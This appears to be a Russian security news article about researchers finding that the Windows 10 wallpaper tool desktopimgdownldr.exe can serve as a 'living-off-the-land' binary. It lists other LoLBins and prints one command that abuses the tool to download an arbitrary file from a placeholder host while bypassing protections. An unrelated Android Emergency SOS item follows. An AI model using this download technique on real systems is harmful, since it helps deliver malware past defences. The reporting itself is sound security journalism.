Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Подпишитесь на новости

Google готовит голосовую активацию Emergency SOS на Android

Вызвать помощь, не прикасаясь к смартфону: Google, похоже, разрабатывает голосовой запуск Emergency SOS. Предполагаемый сценарий — трижды произнести «Help». Именно такую последовательность показывает найденная анимация: затем активируются определение местоположения, экстренная видеозапись и звонок в службу помощи.

Следы функции обнаружила Android Authority в коде приложения Personal Safety. Пользователям она пока недоступна.

Сейчас для запуска SOS обычно требуется пять раз нажать кнопку питания. Голосовой вариант мог бы пригодиться, когда до телефона не дотянуться или руки заняты. В экстренной ситуации искать нужную кнопку — удовольствие сомнительное.

В коде также есть фразы «Say “yes” to continue» и «Say “cancel” to dismiss Emergency SOS». Они указывают на возможное голосовое подтверждение и отмену. Будет ли подтверждение обязательным во всех случаях, пока неизвестно.

Personal Safety доступно не только на Pixel, поэтому авторы публикации допускают появление функции и на совместимых устройствах других производителей.

Но список моделей, поддерживаемые языки и сроки запуска не объявлены. Рассчитывать, что смартфон уже реагирует на русское «Помогите», оснований нет. Пока голосовой SOS остаётся разработкой, найденной при разборе приложения. До релиза Google может изменить сценарий или вовсе не выпустить функцию.

RSS: Новости на портале Anti-Malware.ru